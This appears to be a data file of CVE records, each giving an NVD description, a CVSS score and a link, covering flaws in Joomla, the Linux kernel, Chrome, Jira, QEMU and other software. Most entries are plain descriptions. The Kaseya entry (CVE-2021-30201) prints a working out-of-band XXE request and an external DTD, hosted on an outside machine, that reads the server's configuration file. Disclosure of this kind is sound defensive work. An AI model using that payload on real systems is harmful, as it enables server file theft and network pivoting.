CVE-2022-23793 An issue was discovered in Joomla! 3.0.0 through 3.10.6 & 4.0.0 through 4.1.0. Extracting an specifilcy crafted tar package could write files outside of the intended path. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-23793
CVE-2022-24763 PJSIP is a free and open source multimedia communication library written in the C language. Versions 2.12 and prior contain a denial-of-service vulnerability that affects PJSIP users that consume PJSIP's XML parsing in their apps. Users are advised to update. There are no known workarounds. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24763
CVE-2021-43663 totolink EX300_v2 V4.0.3c.140_B20210429 was discovered to contain a command injection vulnerability via the component cloudupdate_check. 7.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43663
CVE-2020-25638 A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity. 7.4 https://nvd.nist.gov/vuln/detail/CVE-2020-25638
CVE-2021-0232 An authentication bypass vulnerability in the Juniper Networks Paragon Active Assurance Control Center may allow an attacker with specific information about the deployment to mimic an already registered Test Agent and access its configuration including associated inventory details. If the issue occurs, the affected Test Agent will not be able to connect to the Control Center. This issue affects Juniper Networks Paragon Active Assurance Control Center All versions prior to 2.35.6; 2.36 versions prior to 2.36.2. 7.4 https://nvd.nist.gov/vuln/detail/CVE-2021-0232
CVE-2021-3618 ALPACA is an application layer protocol content confusion attack, exploiting TLS servers implementing different protocols but using compatible certificates, such as multi-domain or wildcard certificates. A MiTM attacker having access to victim's traffic at the TCP/IP layer can redirect traffic from one subdomain to another, resulting in a valid TLS session. This breaks the authentication of TLS and cross-protocol attacks may be possible where the behavior of one protocol service may compromise the other at the application layer. 7.4 https://nvd.nist.gov/vuln/detail/CVE-2021-3618
CVE-2022-1155 Old sessions are not blocked by the login enable function. in GitHub repository snipe/snipe-it prior to 5.3.10. 7.4 https://nvd.nist.gov/vuln/detail/CVE-2022-1155
CVE-2021-43237 Windows Setup Elevation of Privilege Vulnerability 7.3 https://nvd.nist.gov/vuln/detail/CVE-2021-43237
CVE-2021-44226 Razer Synapse before 3.7.0228.022817 allows privilege escalation because it relies on %PROGRAMDATA%\\Razer\\Synapse3\\Service\\bin even if %PROGRAMDATA%\\Razer has been created by any unprivileged user before Synapse is installed. The unprivileged user may have placed Trojan horse DLLs there. 7.3 https://nvd.nist.gov/vuln/detail/CVE-2021-44226
CVE-2019-16405 Centreon Web before 2.8.30, 18.10.x before 18.10.8, 19.04.x before 19.04.5 and 19.10.x before 19.10.2 allows Remote Code Execution by an administrator who can modify Macro Expression location settings. CVE-2019-16405 and CVE-2019-17501 are similar to one another and may be the same. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2019-16405
CVE-2021-23337 Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-23337
CVE-2021-39459 Remote code execution in the modules component in Yakamara Media Redaxo CMS version 5.12.1 allows an authenticated CMS user to execute code on the hosting system via a module containing malicious PHP code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-39459
CVE-2021-41244 Grafana is an open-source platform for monitoring and observability. In affected versions when the fine-grained access control beta feature is enabled and there is more than one organization in the Grafana instance admins are able to access users from other organizations. Grafana 8.0 introduced a mechanism which allowed users with the Organization Admin role to list, add, remove, and update users’ roles in other organizations in which they are not an admin. With fine-grained access control enabled, organization admins can list, add, remove and update users' roles in another organization, where they do not have organization admin role. All installations between v8.0 and v8.2.3 that have fine-grained access control beta enabled and more than one organization should be upgraded as soon as possible. If you cannot upgrade, you should turn off the fine-grained access control using a feature flag. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-41244
CVE-2021-43947 Affected versions of Atlassian Jira Server and Data Center allow remote attackers with administrator privileges to execute arbitrary code via a Remote Code Execution (RCE) vulnerability in the Email Templates feature. This issue bypasses the fix of https://jira.atlassian.com/browse/JSDSERVER-8665. The affected versions are before version 8.13.15, and from version 8.14.0 before 8.20.3. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43947
CVE-2022-0550 Improper Input Validation vulnerability in custom report logo upload in Nozomi Networks Guardian, and CMC allows an authenticated attacker with admin or report manager roles to execute unattended commands on the appliance using web server user privileges. This issue affects: Nozomi Networks Guardian versions prior to 22.0.0. Nozomi Networks CMC versions prior to 22.0.0. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-0550
CVE-2022-0551 Improper Input Validation vulnerability in project file upload in Nozomi Networks Guardian and CMC allows an authenticated attacker with admin or import manager roles to execute unattended commands on the appliance using web server user privileges. This issue affects: Nozomi Networks Guardian versions prior to 22.0.0. Nozomi Networks CMC versions prior to 22.0.0. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-0551
CVE-2021-25064 The Wow Countdowns WordPress plugin through 3.1.2 does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-25064
CVE-2021-25068 The Sync WooCommerce Product feed to Google Shopping WordPress plugin through 1.2.4 uses the 'feed_id' POST parameter which is not properly sanitized for use in a SQL statement, leading to a SQL injection vulnerability in the admin dashboard 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-25068
CVE-2021-43097 A Server-side Template Injection (SSTI) vulnerability exists in bbs 5.3 in TemplateManageAction.javawhich could let a malicoius user execute arbitrary code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43097
CVE-2021-43098 A File Upload vulnerability exists in bbs v5.3 via QuestionManageAction.java in a getType function. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43098
CVE-2021-43100 A File Upload vulnerability exists in bbs 5.3 is via TopicManageAction.java in a GetType function, which lets a remote malicious user execute arbitrary code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43100
CVE-2021-43101 A File Upload vulnerability exists in bbs 5.3 is via MembershipCardManageAction.java in a GetType function, which lets a remote malicious user execute arbitrary code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43101
CVE-2021-43102 A File Upload vulnerability exists in bbs 5.3 is via HelpManageAction.java in a GetType function, which lets a remote malicious user execute arbitrary code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43102
CVE-2021-43103 A File Upload vulnerability exists in bbs 5.3 is via ForumManageAction.java in a GetType function, which lets a remote malicious user execute arbitrary code. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-43103
CVE-2022-26641 TP-LINK TL-WR840N(ES)_V6.20 was discovered to contain a buffer overflow via the httpRemotePort parameter. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-26641
CVE-2022-26642 TP-LINK TL-WR840N(ES)_V6.20 was discovered to contain a buffer overflow via the X_TP_ClonedMACAddress parameter. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-26642
CVE-2022-1032 Insecure deserialization of not validated module file in GitHub repository crater-invoice/crater prior to 6.0.6. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-1032
CVE-2022-28223 Tekon KIO devices through 2022-03-30 allow an authenticated admin user to escalate privileges to root by uploading a malicious Lua plugin. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2022-28223
CVE-2021-33208 The "Register an Ehcache Configuration File" admin feature in MashZone NextGen through 10.7 GA allows XXE attacks via a malicious XML configuration file. 7.2 https://nvd.nist.gov/vuln/detail/CVE-2021-33208
CVE-2018-17580 A heap-based buffer over-read exists in the function fast_edit_packet() in the file send_packets.c of Tcpreplay v4.3.0 beta1. This can lead to Denial of Service (DoS) and potentially Information Exposure when the application attempts to process a crafted pcap file. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2018-17580
CVE-2018-17582 Tcpreplay v4.3.0 beta1 contains a heap-based buffer over-read. The get_next_packet() function in the send_packets.c file uses the memcpy() function unsafely to copy sequences from the source buffer pktdata to the destination (*prev_packet)->pktdata. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process a file. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2018-17582
CVE-2020-9805 A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to universal cross site scripting. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2020-9805
CVE-2020-9843 An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to a cross site scripting attack. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2020-9843
CVE-2020-14365 A flaw was found in the Ansible Engine, in ansible-engine 2.8.x before 2.8.15 and ansible-engine 2.9.x before 2.9.13, when installing packages using the dnf module. GPG signatures are ignored during installation even when disable_gpg_check is set to False, which is the default behavior. This flaw leads to malicious packages being installed on the system and arbitrary code executed via package installation scripts. The highest threat from this vulnerability is to integrity and system availability. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2020-14365
CVE-2021-3561 An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2021-3561
CVE-2022-0393 Out-of-bounds Read in GitHub repository vim/vim prior to 8.2. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0393
CVE-2022-0891 A heap buffer overflow in ExtractImageSection function in tiffcrop.c in libtiff library Version 4.3.0 allows attacker to trigger unsafe or out of bounds memory access via crafted TIFF image file which could result into application crash, potential information disclosure or any other context-dependent impact 7.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0891
CVE-2022-24781 Geon is a board game based on solving questions about the Pythagorean Theorem. Malicious users can obtain the uuid from other users, spoof that uuid through the browser console and become co-owners of the target session. This issue is patched in version 1.1.0. No known workaround exists. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24781
CVE-2021-44462 This vulnerability can be exploited by parsing maliciously crafted project files with Horner Automation Cscape EnvisionRV v4.50.3.1 and prior. The issues result from the lack of proper validation of user-supplied data, which can result in reads and writes past the end of allocated data structures. User interaction is required to exploit this vulnerability as an attacker must trick a valid user to open a malicious HMI project file. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44462
CVE-2022-0995 An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0995
CVE-2022-26659 Docker Desktop installer on Windows in versions before 4.6.0 allows an attacker to overwrite any administrator writable files by creating a symlink in place of where the installer writes its log file. Starting from version 4.6.0, the Docker Desktop installer, when run elevated, will write its log files to a location not writable by non-administrator users. 7.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26659
CVE-2019-9627 A buffer overflow in the kernel driver CybKernelTracker.sys in CyberArk Endpoint Privilege Manager versions prior to 10.7 allows an attacker (without Administrator privileges) to escalate privileges or crash the machine by loading an image, such as a DLL, with a long path. 7 https://nvd.nist.gov/vuln/detail/CVE-2019-9627
CVE-2020-28169 The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\\SYSTEM. 7 https://nvd.nist.gov/vuln/detail/CVE-2020-28169
CVE-2020-25697 A privilege escalation flaw was found in the Xorg-x11-server due to a lack of authentication for X11 clients. This flaw allows an attacker to take control of an X application by impersonating the server it is expecting to connect to. 7 https://nvd.nist.gov/vuln/detail/CVE-2020-25697
CVE-2021-40490 A race condition was discovered in ext4_write_inline_data_end in fs/ext4/inline.c in the ext4 subsystem in the Linux kernel through 5.13.13. 7 https://nvd.nist.gov/vuln/detail/CVE-2021-40490
CVE-2021-44733 A use-after-free exists in drivers/tee/tee_shm.c in the TEE subsystem in the Linux kernel through 5.15.11. This occurs because of a race condition in tee_shm_get_from_id during an attempt to free a shared memory object. 7 https://nvd.nist.gov/vuln/detail/CVE-2021-44733
CVE-2019-17343 An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service or gain privileges by leveraging incorrect use of the HVM physmap concept for PV domains. 6.8 https://nvd.nist.gov/vuln/detail/CVE-2019-17343
CVE-2020-9946 This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period. 6.8 https://nvd.nist.gov/vuln/detail/CVE-2020-9946
CVE-2021-27430 GE UR bootloader binary Version 7.00, 7.01 and 7.02 included unused hardcoded credentials. Additionally, a user with physical access to the UR IED can interrupt the boot sequence by rebooting the UR. 6.8 https://nvd.nist.gov/vuln/detail/CVE-2021-27430
CVE-2022-0123 An issue has been discovered affecting GitLab versions prior to 14.4.5, between 14.5.0 and 14.5.3, and between 14.6.0 and 14.6.1. GitLab does not validate SSL certificates for some of external CI services which makes it possible to perform MitM attacks on connections to these external services. 6.8 https://nvd.nist.gov/vuln/detail/CVE-2022-0123
CVE-2021-3543 A flaw null pointer dereference in the Nitro Enclaves kernel driver was found in the way that Enclaves VMs forces closures on the enclave file descriptor. A local user of a host machine could use this flaw to crash the system or escalate their privileges on the system. 6.7 https://nvd.nist.gov/vuln/detail/CVE-2021-3543
CVE-2021-42739 A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or escalate privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. 6.7 https://nvd.nist.gov/vuln/detail/CVE-2021-42739
CVE-2021-0904 In SRAMROM, there is a possible permission bypass due to an insecure permission setting. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS06076938; Issue ID: ALPS06076938. 6.7 https://nvd.nist.gov/vuln/detail/CVE-2021-0904
CVE-2020-25182 Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems. 6.7 https://nvd.nist.gov/vuln/detail/CVE-2020-25182
CVE-2021-39786 In NFC, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-12LAndroid ID: A-192551247 6.7 https://nvd.nist.gov/vuln/detail/CVE-2021-39786
CVE-2010-1282 Adobe Shockwave Player before 11.5.7.609 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted ATOM size in a .dir (aka Director) file. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2010-1282
CVE-2019-12221 An issue was discovered in libSDL2.a in Simple DirectMedia Layer (SDL) 2.0.9 when used in conjunction with libSDL2_image.a in SDL2_image 2.0.4. There is a SEGV in the SDL function SDL_free_REAL at stdlib/SDL_malloc.c. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-12221
CVE-2019-5794 Incorrect handling of cancelled requests in Navigation in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform domain spoofing via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-5794
CVE-2019-5802 Incorrect handling of download origins in Navigation in Google Chrome prior to 73.0.3683.75 allowed a remote attacker to perform domain spoofing via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-5802
CVE-2019-15531 GNU Libextractor through 1.9 has a heap-based buffer over-read in the function EXTRACTOR_dvi_extract_method in plugins/dvi_extractor.c. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-15531
CVE-2019-13140 Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 routers have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-13140
CVE-2019-17344 An issue was discovered in Xen through 4.11.x allowing x86 PV guest OS users to cause a denial of service by leveraging a long-running operation that exists to support restartability of PTE updates. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17344
CVE-2019-17345 An issue was discovered in Xen 4.8.x through 4.11.x allowing x86 PV guest OS users to cause a denial of service because mishandling of failed IOMMU operations causes a bug check during the cleanup of a crashed guest. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17345
CVE-2019-17371 gif2png 2.5.13 has a memory leak in the writefile function. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-17371
CVE-2019-6144 This vulnerability allows a normal (non-admin) user to disable the Forcepoint One Endpoint (versions 19.04 through 19.08) and bypass DLP and Web protection. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-6144
CVE-2019-3420 All versions up to V2.5.0_EG1T5_TED of ZTE ZXHN H108N product are impacted by an information leak vulnerability. An attacker could exploit the vulnerability to obtain sensitive information and perform unauthorized operations. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-3420
CVE-2019-3428 The version V6.01.03.01 of ZTE ZXCDN IAMWEB product is impacted by a configuration error vulnerability. An attacker could directly access the management portal in HTTP, resulting in users’ information leakage. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-3428
CVE-2019-18790 An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-18790
CVE-2019-13745 Insufficient policy enforcement in audio in Google Chrome prior to 79.0.3945.79 allowed a remote attacker to leak cross-origin data via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-13745
CVE-2020-6397 Inappropriate implementation in sharing in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to spoof security UI via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-6397
CVE-2020-6400 Inappropriate implementation in CORS in Google Chrome prior to 80.0.3987.87 allowed a remote attacker to leak cross-origin data via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-6400
CVE-2020-6408 Insufficient policy enforcement in CORS in Google Chrome prior to 80.0.3987.87 allowed a local attacker to obtain potentially sensitive information via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-6408
CVE-2019-12921 In GraphicsMagick before 1.3.32, the text filename component allows remote attackers to read arbitrary files via a crafted image because of TranslateTextEx for SVG. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-12921
CVE-2020-6426 Inappropriate implementation in V8 in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-6426
CVE-2019-20410 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to view sensitive information via an Information Disclosure vulnerability in the comment restriction feature. The affected versions are before version 7.6.17, from version 7.7.0 before 7.13.9, and from version 8.0.0 before 8.4.2. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-20410
CVE-2020-10756 An out-of-bounds read vulnerability was found in the SLiRP networking implementation of the QEMU emulator. This flaw occurs in the icmp6_send_echoreply() routine while replying to an ICMP echo request, also known as ping. This flaw allows a malicious guest to leak the contents of the host memory, resulting in possible information disclosure. This flaw affects versions of libslirp before 4.3.1. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-10756
CVE-2019-20897 The avatar upload feature in affected versions of Atlassian Jira Server and Data Center allows remote attackers to achieve Denial of Service via a crafted PNG file. The affected versions are before version 8.5.4, from version 8.6.0 before 8.6.2, and from version 8.7.0 before 8.7.1. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2019-20897
CVE-2020-24977 GNOME project libxml2 v2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c. The issue has been fixed in commit 50f06b3e. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-24977
CVE-2020-28242 An issue was discovered in Asterisk Open Source 13.x before 13.37.1, 16.x before 16.14.1, 17.x before 17.8.1, and 18.x before 18.0.1 and Certified Asterisk before 16.8-cert5. If Asterisk is challenged on an outbound INVITE and the nonce is changed in each response, Asterisk will continually send INVITEs in a loop. This causes Asterisk to consume more and more memory since the transaction will never terminate (even if the call is hung up), ultimately leading to a restart or shutdown of Asterisk. Outbound authentication must be configured on the endpoint for this to occur. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-28242
CVE-2020-35884 An issue was discovered in the tiny_http crate through 2020-06-16 for Rust. HTTP Request smuggling can occur via a malformed Transfer-Encoding header. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-35884
CVE-2021-3027 app/views_mod/user/user.py in LibrIT PaSSHport through 2.5 is affected by LDAP Injection. There is an information leak through the crafting of special queries, escaping the provided search filter because user input gets no sanitization. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3027
CVE-2021-22207 Excessive memory consumption in MS-WSP dissector in Wireshark 3.4.0 to 3.4.4 and 3.2.0 to 3.2.12 allows denial of service via packet injection or crafted capture file 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-22207
CVE-2020-25713 A malformed input file can lead to a segfault due to an out of bounds array access in raptor_xml_writer_start_element_common. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-25713
CVE-2021-20196 A NULL pointer dereference flaw was found in the floppy disk emulator of QEMU. This issue occurs while processing read/write ioport commands if the selected floppy drive is not initialized with a block device. This flaw allows a privileged guest user to crash the QEMU process on the host, resulting in a denial of service. The highest threat from this vulnerability is to system availability. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-20196
CVE-2020-6950 Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-6950
CVE-2021-26920 In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-26920
CVE-2021-24405 The Easy Cookies Policy WordPress plugin through 1.6.2 is lacking any capability and CSRF check when saving its settings, allowing any authenticated users (such as subscriber) to change them. If users can't register, this can be done through CSRF. Furthermore, the cookie banner setting is not sanitised or validated before being output in all pages of the frontend and the backend settings one, leading to a Stored Cross-Site Scripting issue. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-24405
CVE-2021-30201 The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\\\kaseya\\\\kserver\\\\kserver.ini"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-30201
CVE-2021-36976 libarchive 3.4.1 through 3.5.1 has a use-after-free in copy_string (called from do_uncompress_block and process_block). 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-36976
CVE-2021-41308 Affected versions of Atlassian Jira Server and Data Center allow authenticated yet non-administrator remote attackers to edit the File Replication settings via a Broken Access Control vulnerability in the `ReplicationSettings!default.jspa` endpoint. The affected versions are before version 8.6.0, from version 8.7.0 before 8.13.12, and from version 8.14.0 before 8.20.1. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-41308
CVE-2021-3911 If the ROA that a repository returns contains too many bits for the IP address then OctoRPKI will crash. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3911
CVE-2021-3912 OctoRPKI tries to load the entire contents of a repository in memory, and in the case of a GZIP bomb, unzip it in memory, making it possible to create a repository that makes OctoRPKI run out of memory (and thus crash). 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3912
CVE-2021-43941 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to modify several resources (including CsvFieldMappingsPage.jspa and ImporterValueMappingsPage.jspa) via a Cross-Site Request Forgery (CSRF) vulnerability in the jira-importers-plugin. The affected versions are before version 8.13.15, and from version 8.14.0 before 8.20.3. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43941
CVE-2022-0613 Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0613
CVE-2021-3930 An off-by-one error was found in the SCSI device emulation in QEMU. It could occur while processing MODE SELECT commands in mode_sense_page() if the 'page' argument was set to MODE_PAGE_ALLS (0x3f). A malicious guest could use this flaw to potentially crash QEMU, resulting in a denial of service condition. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3930
CVE-2022-0585 Large loops in multiple protocol dissectors in Wireshark 3.6.0 to 3.6.1 and 3.4.0 to 3.4.11 allow denial of service via packet injection or crafted capture file 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0585
CVE-2022-24687 HashiCorp Consul and Consul Enterprise 1.8.0 through 1.9.14, 1.10.7, and 1.11.2 has Uncontrolled Resource Consumption. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24687
CVE-2021-3667 An improper locking issue was found in the virStoragePoolLookupByTargetPath API of libvirt. It occurs in the storagePoolLookupByTargetPath function where a locked virStoragePoolObj object is not properly released on ACL permission failure. Clients connecting to the read-write socket with limited ACL permissions could use this flaw to acquire the lock and prevent other users from accessing storage pool/volume APIs, resulting in a denial of service condition. The highest threat from this vulnerability is to system availability. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3667
CVE-2022-0865 Reachable Assertion in tiffcp in libtiff 4.3.0 allows attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 5e180045. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0865
CVE-2020-25180 Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x includes the functionality of setting a password that is required to execute privileged commands. The password value passed to ISaGRAF Runtime is the result of encryption performed with a fixed key value using the tiny encryption algorithm (TEA) on an entered or saved password. A remote, unauthenticated attacker could pass their own encrypted password to the ISaGRAF 5 Runtime, which may result in information disclosure on the device. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-25180
CVE-2022-25570 In Click Studios (SA) Pty Ltd Passwordstate 9435, users with access to a passwordlist can gain access to additional password lists without permissions. Specifically, an authenticated user who has write permissions to a password list in one folder (with the default permission model) can extend his permissions to all other password lists in the same folder. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25570
